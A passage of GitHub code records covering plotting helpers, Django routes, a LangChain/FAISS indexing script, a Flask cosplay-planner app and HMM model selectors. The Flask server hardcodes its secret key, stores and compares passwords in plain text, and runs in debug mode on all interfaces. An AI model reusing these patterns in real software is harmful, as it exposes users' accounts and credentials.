result\n","repo_name":"VLatunoV/Python-Final-Project","sub_path":"shopping_cart.py","file_name":"shopping_cart.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11731180642","text":"import plotly.express as px\nimport pandas as pd\nfrom plotly.graph_objs import Figure\n\n\ndef create_topic_cluster_scatter(df: pd.DataFrame, category: str) -> Figure:\n \"\"\"\n Create and combine two scatter plots:\n (1) clustered data points (non-negative cluster labels)\n (2) outliers(cluster label -1)\n \n Parameters:\n - df (pd.DataFrame): DataFrame containing data points with cluster labels.\n - category (str): The name of the column to use for coloring data points.\n \"\"\"\n \n outliers = df.loc[df.cluster_label == -1, :]\n clustered = df.loc[df.cluster_label != -1, :]\n \n # scatter plot for clustered data points\n fig = px.scatter(clustered, x='umap_x', y='umap_y', color= category, hover_data = {\n 'umap_x': False,\n 'umap_y': False,\n 'top_words': True,\n 'cluster_label': True\n })\n \n fig.update_traces(hovertemplate='Top words: %{customdata[0]}
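Working the column-sizing rules of receipt() through one concrete case (my own numbers): for width=50 and total=1.50, the price column is len('1.50') + 2 = 6, bumped to its minimum of 7; a largest quantity of 3 gives 1 + 2 = 3, bumped to 5; the name column takes the remainder, and the pieces reassemble to the requested width:

width, total, max_qty = 50, 1.50, 3
price_width = max(len('{:.2f}'.format(total)) + 2, 7)    # 6 -> bumped to 7
quantity_width = max(len(str(max_qty)) + 2, 5)           # 3 -> bumped to 5
name_width = width - (price_width + quantity_width + 3)  # 35
assert name_width + quantity_width + price_width + 3 == width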
Cluster=%{marker.color}')\n\n # scatter plot for outliers\n outliers_scatter = px.scatter(outliers, x='umap_x', y='umap_y', hover_data = {\n 'umap_x': False,\n 'umap_y': False,\n 'top_words': False,\n 'cluster_label': True\n } )\n outliers_scatter.update_traces(marker=dict(color='lightgray', size = 5), text = 'outliers', hovertemplate='Unclassified')\n\n # add the outlier scatter plot to fig with clusters\n fig.add_trace(outliers_scatter.data[0])\n return fig\n\n\n\ndef custom_scatter_layout(fig: Figure, plot_title: str, x_title: str, y_title: str) -> Figure:\n \"\"\"\n Customizes the layout of a Plotly scatter plot.\n \"\"\"\n fig.update_layout(\n plot_bgcolor = 'white',\n title=plot_title,\n xaxis_title=x_title,\n yaxis_title=y_title,\n height=700,\n width=1000\n )\n\n fig.update_xaxes(\n mirror=True,\n ticks='outside',\n showline=True,\n linecolor='black',\n gridcolor='white'\n )\n\n fig.update_yaxes(\n mirror=True,\n ticks='outside',\n showline=True,\n linecolor='black',\n gridcolor='white'\n )\n\n return fig\n","repo_name":"DorotaBjoorn/Text-Classification-LIA-project","sub_path":"src/visualisation.py","file_name":"visualisation.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"42011165643","text":"import numpy as np\nimport cv2\n\n\ndef draw_labeled_bboxes(img, labels):\n bbox_ = []\n # Iterate through all detected cars\n for car_number in range(1, labels[1]+1):\n # Find pixels with each car_number label value\n nonzero = (labels[0] == car_number).nonzero()\n # Identify x and y values of those pixels\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n # Define a bounding box based on min/max x and y\n bbox = ((np.min(nonzerox), np.min(nonzeroy)), (np.max(nonzerox), np.max(nonzeroy)))\n # Draw the box on the image\n cv2.rectangle(img, bbox[0], bbox[1], (0,0,255), 6)\n bbox_.append(bbox)\n # Return the annotated image and the list of boxes\n return img, bbox_","repo_name":"I-Abdullah-I/CSE464-class-project","sub_path":"Phase II/Helpers/draw_labeled_bboxes.py","file_name":"draw_labeled_bboxes.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"7825722970","text":"from django.urls import path\n\nfrom . 
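draw_labeled_bboxes() above matches the scipy.ndimage.label() convention, where `labels` is a (label_map, n_labels) pair. A hedged usage sketch (the heatmap thresholding is assumed context, not shown in the original, so everything is left commented):

# from scipy.ndimage import label
# heat_labels = label(heatmap > threshold)   # hypothetical heatmap array
# annotated, boxes = draw_labeled_bboxes(np.copy(frame), heat_labels)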
import views\n\nurlpatterns = [\n # Obstetrics module urls start\n\n path('obstetric_main/', views.obstetric_main, name = \"obstetric_main\"),\n path('obstetric_add/', views.obstetric_add, name = \"obstetric_add\"),\n path('perinatal_info_monitors/', views.perinatal_info_monitors, name = \"perinatal_info_monitors\"),\n path('perinatal_info/', views.perinatal_info, name = \"perinatal_info\"),\n path('prenatal_evaluations/', views.prenatal_evaluations, name = \"prenatal_evaluations\"),\n path('puerperium_monitor/', views.puerperium_monitor, name = \"puerperium_monitor\"),\n \n\t# Obstetrics module urls end\n]","repo_name":"frahman30/Health-Care-System","sub_path":"health_obstetrics/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11859238095","text":"import os\nimport openai\nfrom dotenv import load_dotenv\nimport tiktoken\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.vectorstores import FAISS\nfrom langchain.document_loaders import TextLoader\n\n# Loading values from .env file\nload_dotenv()\nAPI_KEY = os.environ.get(\"API_KEY\")\nos.environ[\"OPENAI_API_KEY\"] = API_KEY\nopenai.api_key = API_KEY\n\nCHUNK_SIZE = 1024 # Количество токинов в чанке\nNUMBER_RELEVANT_CHUNKS = 5 # Количество релевантных чанков\n\nloader = TextLoader(\"Docs/База знаний УИИ.txt\", encoding='utf8')\ndocuments = loader.load()\ntext_splitter = CharacterTextSplitter(separator=\"\\n\", chunk_size=CHUNK_SIZE, chunk_overlap=0)\ndocs = text_splitter.split_documents(documents)\n\n# всего получилось чанков:\nprint(f'len(docs)={len(docs)}')\n\n# первый чанк\nprint(f'первый чанк = {docs[0]}')\npage_content = docs[0].page_content\n# длина первого чанка\nprint(f'длина первого чанка = {len(page_content)}')\n\nprint(f'metadata до = {docs[0].metadata}')\n# Устанавливаем метаданные для первого чанка\ndocs[0].metadata[\"teg\"] = \"Описание УИИ\"\n\n# Так перезапишет\n# docs[0].metadata = {\"teg\": \"Описание УИИ\"}\n\n# выводим на печать обновленные метаданные чанка\nprint(f'metadata псле = {docs[0].metadata}')\n\n# Инициализирум модель эмбеддингов\nembeddings = OpenAIEmbeddings()\n\n# Создадим индексную базу из разделенных фрагментов текста\n# https://python.langchain.com/docs/integrations/vectorstores/faiss\ndb = FAISS.from_documents(docs, embeddings)\n\n# Поиск текста по схожести\n# similarity_search\nprint('similarity_search')\nquery = \"нужно ли знать математику?\"\ndocs = db.similarity_search(query, k=NUMBER_RELEVANT_CHUNKS)\n\ni=1\nfor item in docs:\n print(f'{i} item.page_content={item.page_content}\\n\\n')\n i += 1\n\n# similarity_search_with_score\nprint('similarity_search_with_score')\ndocs_and_scores = db.similarity_search_with_score(query, k=NUMBER_RELEVANT_CHUNKS)\n\n# print (type(docs_and_scores))\n# print (docs_and_scores)\ni=1\nfor doc in docs_and_scores:\n print(f'{i}')\n for item in doc:\n print (item)\n\n i += 1\n print(f'\\n')\n\n# Нужно проверять условие изменения файла Базы знаний.\n# db.save_local(\"/content/drive/My Drive/faiss_index\")\ndb.save_local(\"DB/faiss_index\")\nprint('Db saved')\n\n#Load file.\nnew_db = db.load_local('DB/faiss_index', embeddings)\nprint('Db loaded')\n\ndocs = new_db.similarity_search(query, k=NUMBER_RELEVANT_CHUNKS)\n\ni=1\nfor item in docs:\n print(f'{i} item.page_content={item.page_content}\\n\\n')\n i += 
1\n","repo_name":"kvoloshenko/LLMT_01","sub_path":"ChatGPT_Course_01/L1_04_Text2chunks.py","file_name":"L1_04_Text2chunks.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71173159921","text":"from flask import Flask, render_template, flash, request, session, redirect\nfrom datetime import datetime\nimport requests\nfrom model import connect_to_db, db, User, Collection, Outfit, Character, Shop, Item, Show\nimport crud\nimport os\nfrom dotenv import dotenv_values\n\nconfig = {\n **dotenv_values(\".env.secret\"),\n **os.environ,\n}\n\napp = Flask(__name__)\napp.secret_key = 'secret_key'\n\n# Display Webpages\n@app.route('/')\ndef show_homepage():\n if 'user_info' not in session:\n session[\"user_info\"] = {}\n session.modified = True\n return render_template(\"homepage.html\")\n else:\n return render_template(\"homepage.html\")\n\n@app.route('/my-accounts')\ndef nav_user_acct_name():\n \n if 'user_name' not in session[\"user_info\"]:\n return redirect('/login')\n else:\n return render_template(\"account.html\")\n\n@app.route('/my-collections')\ndef nav_user_collections():\n \n if 'user_name' not in session[\"user_info\"]:\n return redirect('/login')\n else:\n return render_template(\"collections.html\", page_type=\"base\")\n\n@app.route('/my-collections/')\ndef nav_to_collection(collection_name):\n return render_template(\"collections.html\", page_type=\"collection\")\n\n@app.route('/my-outfits')\ndef nav_user_outfits():\n \n if 'user_name' not in session[\"user_info\"]:\n return redirect('/login')\n else:\n return render_template(\"outfits.html\", page_type=\"base\")\n\n@app.route('/my-outfits/')\ndef nav_to_outfit(outfit_name):\n return render_template(\"outfits.html\", page_type=\"ind_outfit\")\n\n@app.route('/login')\ndef nav_login():\n return render_template(\"login.html\")\n\n@app.route('/characters')\ndef nav_character():\n return render_template(\"characters.html\", page_type=\"base\")\n\n@app.route('/characters/')\ndef show_character_page(character_name):\n\n return render_template(\"characters.html\", page_type=\"ind_character_page\")\n\n@app.route('/shows')\ndef nav_show():\n return render_template(\"shows.html\", page_type=\"base\")\n\n@app.route('/shows/')\ndef show_show_page(show_title):\n \n return render_template(\"shows.html\", page_type=\"ind_show_page\")\n\n@app.route('/create/new-outfit')\ndef nav_create_new_outfit_page():\n \n if 'user_name' not in session[\"user_info\"]:\n return redirect('/login')\n else:\n return render_template(\"create.html\", page_type=\"new_outfit\")\n \n@app.route('/create/new-collection')\ndef nav_create_new_collection_page():\n \n if 'user_name' not in session[\"user_info\"]:\n return redirect('/login')\n else:\n return render_template(\"create.html\", page_type=\"new_collection\")\n\n@app.route('/create')\ndef nav_create_page():\n \n if 'user_name' not in session[\"user_info\"]:\n return redirect('/login')\n else:\n return render_template(\"create.html\")\n\n# POST and GETS\n# api routes\n@app.route('/disp_all_anime', methods=[\"POST\"])\ndef disp_all_anime():\n page_change = request.get_json()\n page_number = page_change[\"page\"]\n\n url, query, variables = crud.get_all_anime()\n variables = {\"page\": page_number, \"perPage\": 20}\n response = requests.post(url, json={'query': query, 'variables': variables}).json()['data']['Page']\n return response\n\n@app.route('/disp_all_characters', methods=[\"POST\"])\ndef disp_all_characters():\n 
page_change = request.get_json()\n page_number = page_change[\"page\"]\n\n url, query, variables = crud.get_all_characters()\n variables = {\"page\": page_number, \"perPage\": 9}\n response = requests.post(url, json={'query': query, 'variables': variables}).json()['data']['Page']\n return response\n\n@app.route('/find_character', methods=[\"POST\"])\ndef disp_all_char_matches():\n inputName = request.get_json()\n\n url, query, variables = crud.api_find_all_character_by_name(inputName[\"name\"])\n response = requests.post(url, json={'query': query, 'variables': variables})\n return response.json()\n\n@app.route('/find_single_character', methods=[\"POST\"])\ndef disp_character_info():\n inputName = request.get_json()\n\n url, query, variables = crud.api_get_single_character(inputName[\"name\"])\n char_info = requests.post(url, json={'query': query, 'variables': variables}).json()[\"data\"][\"Character\"]\n show_list = {}\n\n for show in char_info[\"media\"][\"edges\"]:\n show_id = show[\"node\"][\"id\"]\n show_list[show_id] = show_list.get(show_id, {\"eng_title\": show[\"node\"][\"title\"][\"english\"], \n \"native_title\": show[\"node\"][\"title\"][\"native\"], \"show_img\": show[\"node\"][\"coverImage\"][\"medium\"]})\n\n response = {\"img\": char_info[\"image\"][\"medium\"], \"eng_name\": char_info[\"name\"][\"full\"], \"native_name\": char_info[\"name\"][\"native\"], \n \"age\": char_info[\"age\"], \"description\": char_info[\"description\"], \"gender\": char_info[\"gender\"], \"appears_in\": show_list}\n\n return response\n\n@app.route(\"/find_show\", methods=[\"POST\"])\ndef disp_show_info():\n show_title = request.get_json()[\"showName\"]\n url, query, variables = crud.api_get_single_show_by_name(show_title)\n show_info = requests.post(url, json={'query': query, 'variables': variables}).json()[\"data\"][\"Media\"]\n\n character_dic = {}\n for character in show_info[\"characters\"][\"edges\"]:\n character_id = character[\"node\"][\"id\"]\n character_img = character[\"node\"][\"image\"][\"medium\"]\n character_eng_name = character[\"node\"][\"name\"][\"full\"]\n character_native_name = character[\"node\"][\"name\"][\"native\"]\n\n character_dic[character_id] = character_dic.get(character_id, {\"character_img\": character_img, \"character_eng_name\": character_eng_name, \"character_native_name\": character_native_name})\n\n if show_info['endDate']['year'] == None: \n endDate = \"--/--/----\"\n else:\n endDate = datetime(show_info['endDate']['year'], show_info['endDate']['month'], show_info['endDate']['day']).strftime(\"%B/%d/%Y\")\n\n response = {\"show_info\":{\"show_img\": show_info['coverImage'][\"medium\"], \"show_eng_title\": show_info['title']['english'], \"show_native_title\": show_info['title']['native'], \n \"start_date\": datetime(show_info['startDate']['year'], show_info['startDate']['month'], show_info['startDate']['day']).strftime(\"%B/%d/%Y\"), \n \"end_date\": endDate, \n \"show_description\": show_info[\"description\"], \"num_episodes\": show_info[\"episodes\"]}, \"characters_in_show\": character_dic}\n return response\n\n#Sessions handling\n@app.route('/handle_login', methods=['POST'])\ndef handle_login():\n \"\"\"Log in user\"\"\"\n form = request.get_json()\n formType = form[\"formType\"]\n response = {\"message\": False, \"status\": False, \"user_name\": \"\"}\n \n\n if form[\"user_name\"] == None:\n response[\"message\"] = \"You haven't entered anything yet\"\n return response\n\n\n \n if formType == \"Login\":\n user = 
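All of the API routes above share one wire format: a POST whose JSON body carries a GraphQL query string plus a variables dict. The actual query text lives in crud.py, which is not shown; this is a schematic stand-in, not the app's real query:

# query = """query ($page: Int, $perPage: Int) {
#   Page(page: $page, perPage: $perPage) { media { id } }
# }"""
# data = requests.post(url, json={"query": query,
#                                 "variables": {"page": 1, "perPage": 20}}).json()["data"]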
crud.get_user_by_user_name_or_email(form[\"user_name\"])\n if user == None:\n response[\"message\"] = \"Looks like we dont have that username or email. Click below to create an account.\"\n\n elif form[\"password\"] != user.user_password:\n response[\"message\"] = \"Wrong Password\"\n\n else: \n response[\"message\"] = \"Logged in\"\n response[\"status\"] = True\n\n session[\"user_info\"][\"user_name\"] = user.user_name\n session[\"user_info\"][\"user_id\"] = user.user_id\n session[\"user_info\"][\"user_password\"] = user.user_password\n session[\"user_info\"][\"email\"] = user.email\n session.modified = True\n\n \n elif formType == \"Create Account\":\n user = crud.get_user_by_user_name_or_email(form[\"email\"]) or crud.get_user_by_user_name_or_email(form[\"user_name\"])\n \n if \"@\" not in form[\"email\"]:\n response[\"message\"] = \"Please enter a valid email address\"\n \n elif user != None:\n response[\"message\"] = \"Looks like that email or user name already exist. Please log in or click forgot password.\"\n \n elif None in form.values():\n response[\"message\"] = \"Please fill out all fields to create account\"\n \n elif form[\"password\"] != form[\"password2\"]:\n response[\"message\"] = \"passwords do not match\"\n \n else:\n user = crud.create_new_user(form[\"user_name\"], form[\"password\"], \n form[\"fname\"], form[\"lname\"], form[\"email\"])\n db.session.add(user)\n db.session.commit()\n\n if (user != None) and (user.user_password == form[\"password\"]):\n response[\"message\"] = \"Account Created!\"\n response[\"status\"] = True\n response[\"user_name\"] = user.user_name\n \n session[\"user_info\"][\"user_name\"] = user.user_name\n session[\"user_info\"][\"user_id\"] = user.user_id\n session[\"user_info\"][\"user_password\"] = user.user_password\n session[\"user_info\"][\"email\"] = user.email\n session.modified = True\n\n elif response[\"message\"] == False:\n response[\"message\"] = \"There was an error in creating your account\"\n\n return response\n\n@app.route('/loggedIn')\ndef is_logged_in():\n response = {\"status\": False}\n if 'user_name' not in session['user_info']:\n return response\n else: \n response[\"status\"]=True\n return response\n\n@app.route('/acct_info')\ndef get_acct_info():\n user = crud.get_user_by_user_name_or_email(session[\"user_info\"][\"user_name\"])\n outfits = crud.get_users_outfits_by_id(user.user_id)\n collections = crud.get_users_collections_by_id(user.user_id)\n outfitInfo = []\n collectionInfo =[]\n for outfit in outfits:\n outfitCharImg = \"Empty\" if outfit.character_id == None else(crud.get_character_by_name_or_id(outfit.character_id).character_image_URL)\n outfitInfo.append((outfit.outfit_name, outfitCharImg))\n \n for collection in collections:\n collectionInfo.append((collection.collection_name, collection.last_updated.strftime(\"%B %d, %Y\"), len(collection.outfit_list)))\n \n account_info = {\"user_name\": user.user_name, \"date_created\": (user.date_created).strftime(\"%b %d, %Y\"), \n \"count_outfits\": len(outfits) , \"count_collect\": len(collections), \"collectionInfo\": collectionInfo, \"outfitInfo\": outfitInfo}\n\n return account_info\n\n@app.route('/user_creations')\ndef get_user_creations():\n user = crud.get_user_by_user_name_or_email(session[\"user_info\"][\"user_name\"])\n collections = crud.get_users_collections_by_id(user.user_id)\n outfits = crud.get_users_outfits_by_id(user.user_id)\n\n if len(collections) != 0:\n collecitons_info = []\n\n for collection in collections:\n char_list=[]\n outfit_list = []\n\n if 
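handle_login() above stores and compares passwords in plain text. A hedged hardening sketch using Werkzeug (a Flask dependency), shown separately rather than as a claim about the app's actual design:

from werkzeug.security import generate_password_hash, check_password_hash

hashed = generate_password_hash("s3cret")      # salted hash, safe to store
assert check_password_hash(hashed, "s3cret")   # verify at login time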
collection.outfit_list != 0:\n for outfit in collection.outfit_list:\n outfit_list.append(outfit.outfit_name)\n char_list.append(crud.get_character_by_name_or_id(outfit.character_id).character_name)\n else:\n outfit_list.append(\"No Outfits in collection click the outfit tab and create a new one\")\n char_list.append(\"No Outfits in collection click the outfit tab and create a new one\")\n\n collecitons_info.append((collection.collection_name, collection.last_updated.strftime(\"%b-%d-%Y\"), char_list, outfit_list))\n\n collection_names = [collection.collection_name for collection in collections]\n else:\n collection_names = [\"No collections created. Select create new or no collection.\"]\n \n response = {\"collection_names\": collection_names, \"collections_info\": collecitons_info}\n return response\n\n@app.route('/get_outfit_info', methods=[\"POST\"])\ndef get_user_outfit_info():\n outfit_name = request.get_json()[\"name\"]\n outfit = crud.get_outfit_by_id_or_name(outfit_name)\n character = crud.get_character_by_name_or_id(outfit.character_id)\n collections = {}\n\n for collection in outfit.collection_list:\n collection_name = crud.get_colleciton(collection.collection_id).collection_name\n collections[collection.collection_id] = collections.get(collection.collection_id, collection_name)\n\n response = {\"outfit_name\": outfit.outfit_name, \"based_on\": character.character_name, \"based_on_img\": character.character_image_URL, \n \"collecitons_in\": collections, \"notes\": outfit.notes}\n\n return response\n\n@app.route('/get_collection_info', methods=[\"POST\"])\ndef get_user_collection_info():\n form = request.get_json()\n print(f\"*****{form}\")\n collection = crud.get_colleciton(form[\"name\"])\n char_list=[]\n outfit_list = []\n\n if collection.outfit_list != 0:\n for outfit in collection.outfit_list:\n outfit_list.append(outfit.outfit_name)\n char_list.append({\"char_name\": crud.get_character_by_name_or_id(outfit.character_id).character_name, \n \"char_img\": crud.get_character_by_name_or_id(outfit.character_id).character_image_URL})\n else:\n outfit_list.append(\"No Outfits in collection click the outfit tab and create a new one\")\n char_list.append(\"No Outfits in collection click the outfit tab and create a new one\")\n\n response = {\"collection_name\": form[\"name\"], \"char_list\": char_list, \"outfit_list\": outfit_list}\n return response\n\n@app.route('/create_new_outfit', methods=[\"POST\"])\ndef create_new():\n# Getting form infomation\n form = request.get_json()\n formType = form[\"formType\"]\n response = {\"submit_status\": False, \"message\": \"Error in creating outfit\"}\n user_id = session[\"user_info\"][\"user_id\"]\n#Adding charcter/show to site db after submission\n if crud.get_character_by_name_or_id(form[\"character_name\"]) == None:\n url, query, variables = crud.api_get_single_character(form[\"character_name\"])\n api_response = (requests.post(url, json={'query': query, 'variables': variables}).json())[\"data\"][\"Character\"]\n gender = api_response['gender'][0]\n character_image_URL = api_response['image']['medium']\n show_name = api_response[\"media\"]['edges'][0]['node']['title']['english']\n\n if crud.get_show_by_id_or_name(show_name) == None:\n url, query, variables = crud.api_get_single_show_by_name(show_name)\n api_show_response = (requests.post(url, json={'query': query, 'variables': variables}).json())[\"data\"][\"Media\"]\n\n english_title = api_show_response['title']['english']\n japanese_title = api_show_response['title']['native']\n air_date = 
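A behavioral note on the `collection.outfit_list != 0` guards above: a Python list never compares equal to 0, so those branches always run; plain truthiness (`if collection.outfit_list:`) expresses the intended non-empty test:

assert [] != 0 and ["x"] != 0      # both lists differ from 0
assert not [] and bool(["x"])      # truthiness distinguishes empty from non-empty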
datetime(api_show_response['startDate']['year'], api_show_response['startDate']['month'], api_show_response['startDate']['day'])\n new_show = crud.add_new_show(english_title, japanese_title, air_date)\n db.session.add(new_show)\n db.session.commit()\n\n new_char = crud.add_new_character(form[\"character_name\"], character_image_URL, gender, (crud.get_show_by_id_or_name(show_name)).show_id)\n db.session.add(new_char)\n db.session.commit()\n\n# User created outfit\n outfit_public = True if form[\"outfit_public\"] == \"Public\" else False\n new_outfit = crud.create_new_outfit(form[\"outfit_name\"], form[\"outfit_notes\"], crud.get_character_by_name_or_id(form[\"character_name\"]).character_id, user_id, outfit_public)\n db.session.add(new_outfit)\n db.session.commit()\n\n# User created new outfit add added to either a new or existing collection\n if formType == \"createNew\":\n collection_public = True if form[\"collection_public\"] == \"Public\" else False\n new_col = crud.create_new_collection(form[\"collection_name\"], user_id, collection_public)\n db.session.add(new_col)\n db.session.commit()\n\n new_col_out = crud.add_outfit_to_collection(crud.get_colleciton(form[\"collection_name\"]).collection_id, crud.get_outfit_by_id_or_name(form[\"outfit_name\"]).outfit_id)\n db.session.add(new_col_out)\n db.session.commit()\n\n reponse = {\"submit_status\": True, \"message\": \"Outfit created\"}\n return reponse\n \n elif formType == \"useExist\":\n new_col_out = crud.add_outfit_to_collection(crud.get_colleciton(form[\"collection_name\"]).collection_id, crud.get_outfit_by_id_or_name(form[\"outfit_name\"]).outfit_id)\n db.session.add(new_col_out)\n db.session.commit()\n \n reponse = {\"submit_status\": True, \"message\": \"Outfit created\"}\n return reponse\n\n else:\n reponse = {\"submit_status\": True, \"message\": \"Outfit created\"}\n return reponse \n\n@app.route('/create_new_col', methods=[\"POST\"])\ndef create_new_col():\n form = request.get_json()\n\n new_col = crud.create_new_collection(form[\"collection_name\"], session[\"user_info\"][\"user_id\"], True if form[\"public\"]==\"Public\" else False)\n db.session.add(new_col)\n db.session.commit()\n\n if form[\"outfitsList\"] != 0 :\n collection_id = crud.get_colleciton(form[\"collection_name\"]).collection_id\n for outfit in form[\"outfitsList\"]:\n outfit_id = crud.get_outfit_by_id_or_name(outfit).outfit_id\n add_out = crud.add_outfit_to_collection(collection_id, outfit_id)\n db.session.add(add_out)\n db.session.commit()\n response = {\"message\": \"successful\"}\n return response\n\n@app.route('/update_outfit', methods=[\"POST\"])\ndef update_outfit():\n form = request.get_json()\n outfit_id = crud.get_outfit_by_id_or_name(form[\"current_outfit\"]).outfit_id\n response = {\"message\": \"success\"}\n\n if form[\"change_name\"] != None:\n crud.change_outfit_name(outfit_id, form[\"change_name\"])\n db.session.commit()\n return response\n elif form[\"add_col\"] != None:\n for collection in form[\"add_col\"]:\n collection_id = crud.get_colleciton(collection).collection_id\n out_col = crud.add_outfit_to_collection(collection_id, outfit_id)\n db.session.add(out_col)\n db.session.commit()\n return response\n elif form[\"remove_col\"] != None:\n for collection in form[\"remove_col\"]:\n collection_id = crud.get_colleciton(collection).collection_id\n collection_object = crud.get_collection_outfit_object(outfit_id, collection_id)\n db.session.delete(collection_object)\n db.session.commit()\n return response\n elif form[\"notes\"] != None:\n 
crud.get_outfit_by_id_or_name(outfit_id).notes = form[\"notes\"]\n db.session.commit()\n return response\n \n return response\n\n@app.route('/update_collection', methods=[\"POST\"])\ndef update_user_collection():\n form = request.get_json()\n response = {\"message\": \"success\"}\n\n return response\n\n@app.route('/delete_creation', methods=[\"POST\"])\ndef delete_user_creation():\n form = request.get_json()\n response = {\"message\": \"success\"}\n\n if form[\"action\"] == \"delete_outfit\":\n outfit = crud.get_outfit_by_id_or_name(form[\"outfit_name\"])\n if outfit.collection_list:\n for col in outfit.collection_list:\n out_col = crud.get_collection_outfit_object(outfit.outfit_id, col.collection_id)\n db.session.delete(out_col)\n db.session.commit()\n\n\n db.session.delete(outfit)\n db.session.commit()\n elif form[\"action\"] == \"delete_collection\":\n collection = crud.get_colleciton(form[\"collection_name\"])\n if collection.outfit_list:\n for outfit in collection.outfit_list:\n out_col = crud.get_collection_outfit_object(outfit.outfit_id, collection.collection_id)\n db.session.delete(out_col)\n db.session.commit()\n\n # delete the collection itself once its outfit links are removed\n db.session.delete(collection)\n db.session.commit()\n\n\n return response\n\nif __name__ == \"__main__\":\n connect_to_db(app)\n app.run(debug=True, host=\"0.0.0.0\")\n","repo_name":"zhlavenh/Cosplay-Planner-App","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":19821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"27595412678","text":"import math\nimport warnings\n\nimport numpy as np\nfrom hmmlearn.hmm import GaussianHMM\nfrom sklearn.model_selection import KFold\nfrom asl_utils import combine_sequences\n\n\nclass ModelSelector(object):\n '''\n base class for model selection (strategy design pattern)\n '''\n\n def __init__(self, all_word_sequences: dict, all_word_Xlengths: dict, this_word: str,\n n_constant=3,\n min_n_components=2, max_n_components=10,\n random_state=14, verbose=False):\n self.words = all_word_sequences\n self.hwords = all_word_Xlengths\n self.sequences = all_word_sequences[this_word]\n self.X, self.lengths = all_word_Xlengths[this_word]\n self.this_word = this_word\n self.n_constant = n_constant\n self.min_n_components = min_n_components\n self.max_n_components = max_n_components\n self.random_state = random_state\n self.verbose = verbose\n\n def select(self):\n for numComponents in range(self.min_n_components, self.max_n_components + 1):\n print(numComponents)\n\n def base_model(self, num_states):\n # with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n # warnings.filterwarnings(\"ignore\", category=RuntimeWarning)\n try:\n hmm_model = GaussianHMM(n_components=num_states, covariance_type=\"diag\", n_iter=1000,\n random_state=self.random_state, verbose=False).fit(self.X, self.lengths)\n if self.verbose:\n print(\"model created for {} with {} states\".format(self.this_word, num_states))\n return hmm_model\n except:\n if self.verbose:\n print(\"failure on {} with {} states\".format(self.this_word, num_states))\n return None\n\n\nclass SelectorConstant(ModelSelector):\n \"\"\" select the model with value self.n_constant\n\n \"\"\"\n\n def select(self):\n \"\"\" select based on n_constant value\n\n :return: GaussianHMM object\n \"\"\"\n best_num_components = self.n_constant\n return self.base_model(best_num_components)\n\n\nclass SelectorBIC(ModelSelector):\n \"\"\" select the model with the lowest Bayesian Information Criterion (BIC) score\n\n http://www2.imm.dtu.dk/courses/02433/doc/ch6_slides.pdf\n Bayesian information criterion: BIC = -2 * logL + p * logN\n \"\"\"\n\n def select(self):\n \"\"\" select the best model for self.this_word based on\n BIC score for n between self.min_n_components and self.max_n_components\n\n :return: GaussianHMM object\n \"\"\"\n warnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n betterScore = math.inf\n betterModel = None\n for numComponents in range(self.min_n_components, self.max_n_components + 1):\n try:\n if self.verbose:\n print(\"\\n\\n WORKING FOR WORD {} FOR {} STATES IN HMM\".format(self.this_word, numComponents))\n model = self.base_model(numComponents)\n logl = model.score(self.X, self.lengths)\n # the number of parameters:\n # Transition probabilities (numComponents*(numComponents-1)) +\n # Starting probabilities (numComponents-1) +\n # Means (numComponents*n_features) + Variances (numComponents*n_features)\n n_features = len(self.X[0])\n p = (numComponents*numComponents) + (2*numComponents*n_features) - 1\n # the number of data points: here, the number of sequences recorded for the word\n N = len(self.lengths)\n\n # the BIC score\n BIC_score = -2*logl + (p*math.log(N))\n if self.verbose:\n print(\" score {} \".format(BIC_score))\n\n if BIC_score < betterScore:\n if self.verbose:\n print(\" {} components with lower score until now (the lower the better)\".format(numComponents))\n betterScore = BIC_score\n betterModel = model\n\n except:\n if self.verbose:\n print(\" FAIL TRAINING FOR {} COMPONENTS IN HMM\".format(numComponents))\n break\n return betterModel\n\n\n\nclass SelectorDIC(ModelSelector):\n ''' select best model based on Discriminative Information Criterion\n\n Biem, Alain. \"A model selection criterion for classification: Application to hmm topology optimization.\"\n Document Analysis and Recognition, 2003. Proceedings. Seventh International Conference on. IEEE, 2003.\n http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.58.6208&rep=rep1&type=pdf\n DIC = log(P(X(i))) - 1/(M-1) * SUM(log(P(X(all but i))))\n '''\n\n def select(self):\n warnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n betterScore = -math.inf\n betterModel = None\n\n\n for numComponents in range(self.min_n_components, self.max_n_components + 1):\n try:\n if self.verbose:\n print(\"\\n\\n WORKING FOR WORD {} FOR {} STATES IN HMM\".format(self.this_word, numComponents))\n model = self.base_model(numComponents)\n logl = model.score(self.X, self.lengths)\n\n scores = []\n for __wrd in self.words.keys():\n if(__wrd != self.this_word):\n try:\n __X, __lengths = self.hwords[__wrd]\n # use a separate variable so the log likelihood of this_word is not overwritten\n __logl = model.score(__X, __lengths)\n scores.append(__logl)\n except:\n continue\n\n\n # calculating DIC score\n DIC_score = logl - np.mean(scores)\n if self.verbose:\n print(\" score {} \".format(DIC_score))\n\n if DIC_score > betterScore:\n if self.verbose:\n print(\" {} components with bigger score until now (the bigger the better)\".format(numComponents))\n betterScore = DIC_score\n betterModel = model\n\n except:\n if self.verbose:\n print(\" FAIL TRAINING FOR {} COMPONENTS IN HMM\".format(numComponents))\n break\n return betterModel\n\n\nclass SelectorCV(ModelSelector):\n ''' select best model based on average log Likelihood of cross-validation folds\n\n '''\n\n def select(self):\n maxScore = -math.inf\n maxModel = 